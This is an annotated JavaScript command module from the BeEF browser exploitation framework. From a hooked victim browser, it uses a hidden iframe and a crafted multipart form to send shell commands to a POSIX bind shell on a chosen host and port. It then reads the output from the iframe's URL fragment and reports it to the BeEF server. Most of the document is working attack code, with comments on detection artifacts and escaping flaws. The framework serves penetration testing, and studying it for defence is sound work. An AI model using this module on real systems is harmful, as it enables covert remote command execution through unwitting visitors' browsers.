Path: blob/master/modules/ipec/inter_protocol_posix_bindshell/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// BeEF command module: inter-protocol communication with a POSIX bind shell.
// From the hooked browser it submits a multipart form out of a hidden iframe
// to http://<ip>:<port>/index.html?&/bin/sh; and then polls the iframe's URL
// for the "#ipc_result=" fragment that carries the command output back.
//
// Everything between <%= %> is ERB-interpolated server-side before the script
// reaches the browser. None of those values are escaped for the JavaScript
// context: a "'" inside @cmd ends the single-quoted literal below, and
// @command_id is emitted unquoted, so it must be numeric.
//
// Artifacts this leaves on the hooked page (useful for detection): a 1x1
// hidden iframe whose id starts with "ipc_posix_window_", a multipart/form-data
// POST from the browser to the configured target port, and the "#ipc_result="
// fragment on the iframe URL. Several helpers (myform, body1, body2, myExt,
// end_talkback, myExt2, ipc_result, output) are assigned without var and so
// leak onto the page's global window object.

beef.execute(function() {

// All of these arrive as strings from the template, including the numeric
// ones; the arithmetic and comparisons below rely on implicit coercion
// (size*1, --size, internal_counter > timeout).
var target_ip = "<%= @ip %>";
var target_port = "<%= @port %>";
var cmd = '<%= @cmd %>';
var timeout = "<%= @command_timeout %>";   // seconds; polled once per second in waituntilok()
var internal_counter = 0;                  // number of one-second polls done so far
var result_size = "<%= @result_size %>";   // max bytes of command output (head -c)

// create iframe
// The iframe is the navigation target for the form POST and the channel for
// the reply: the response body is expected to set window.location back to the
// parent URL with "#ipc_result=<encoded output>" appended.
var iframe = document.createElement("iframe");
iframe.setAttribute("id","ipc_posix_window_<%= @command_id %>");
iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
document.body.appendChild(iframe);

// send a request
// Builds and submits a multipart form inside the iframe. Form field names and
// values are chosen so that, read line by line by /bin/sh, they print an HTTP
// response whose body is body1 + <command output> + body2.
// Parameters: ip/port of the listener, cmd the shell command, size the output
// byte limit (a string; coerced where used). No return value.
function send_cmds(ip, port, cmd, size) {

var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh;";
var parent = window.location.href;   // local; shadows window.parent on purpose

// create form
// NOTE: myform, body1, body2, myExt, end_talkback and myExt2 below are
// implicit globals (no var) on the hooked page's window.
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype","multipart/form-data");
myform.setAttribute("action",action);
document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform);

// body1/body2 wrap the command output in an HTML page whose trailing script
// navigates the iframe back to the parent origin with the encoded output in
// the fragment; "</s"+"cript>" is split so the literal cannot close this
// module's own script tag. The end marker is used by waituntilok() to trim
// the result.
body1="<html><body><div id='ipc_content'>";
body2="__END_OF_POSIX_IPC<%= @command_id %>__</div><s"+"cript>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);</"+"script></body></html>";

// post results separator
// Content-Length is precomputed as body1 + cmd text + body2 + size, so the
// padding in end_talkback below has to fill exactly "size" bytes.
myExt = document.createElement("INPUT");
myExt.setAttribute("id",<%= @command_id %>);
myExt.setAttribute("name",<%= @command_id %>);
myExt.setAttribute("value","echo -e HTTP/1.1 200 OK\\\\r;echo -e Content-Type: text/html\\\\r;echo -e Content-Length: "+(body1.length+cmd.length+body2.length+size*1)+"\\\\r;echo -e Keep-Alive: timeout=5,max=100\\\\r;echo -e Connection: keep-alive\\\\r;echo -e \\\\r;echo \""+body1+"\";(" + cmd + ")|head -c "+size+" ; ");
myform.appendChild(myExt);

// Adding buffer space for the command result
// NOTE(review): in this rendering the string literal below spans a line
// break; confirm in the source file whether that is a line continuation or
// an escape, as a raw newline is not valid inside a JS string literal.
// --size coerces the string to a number; a non-numeric size yields NaN and
// the loop adds no padding at all.
end_talkback=" 
echo -e \""+body2;
while(--size) end_talkback+=" ";
end_talkback+="\" \\\\r ;";

// post js to call home and close connection
myExt2 = document.createElement("INPUT");
myExt2.setAttribute("id","endTag");
myExt2.setAttribute("name","</div>");
myExt2.setAttribute("value",end_talkback);

myform.appendChild(myExt2);
myform.submit();
}

// wait <timeout> seconds for iframe url fragment to match #ipc_result=
// Polls once per second. Reading contentWindow.location while the iframe is
// still on the target origin throws a cross-origin error; the catch treats
// that, and the explicit throw below, as "no result yet" and re-arms the
// timer until internal_counter exceeds timeout.
function waituntilok() {

try {
// RegExp.test stringifies the Location object, i.e. tests its href.
if (/#ipc_result=/.test(document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.location)) {
ipc_result = document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.location.href;
// 12 == "#ipc_result=".length; the end marker from body2 bounds the output.
output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_POSIX_IPC<%= @command_id %>__'));
// NOTE(review): the replace pairs below appear here as "<"->"<" and ">"->">",
// which are no-ops; this is most likely HTML entities (&lt;/&gt;) lost in
// rendering. Confirm the source escapes angle brackets before the output is
// handed to the BeEF UI, since the returned text comes from the remote host.
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "<").replace(/>/g, ">").replace(/<br>/gi, "<br>"));
document.body.removeChild(iframe);
return;
} else throw("command results haven't been returned yet");   // string, not Error: only used as a jump to the catch block
} catch (e) {
internal_counter++;
// timeout is a string; ">" coerces it to a number.
if (internal_counter > timeout) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
document.body.removeChild(iframe);
return;
}
setTimeout(function() {waituntilok()},1000);
}
}

// validate target
// Empty ip/port and an invalid port are reported back as "fail=..." without
// creating the form; note the iframe has already been added above either way.
if (!target_port || !target_ip) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
} else if (!beef.net.is_valid_port(target_port)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
// send request and wait for reply
} else {
send_cmds(target_ip, target_port, cmd,result_size);
waituntilok();
}

});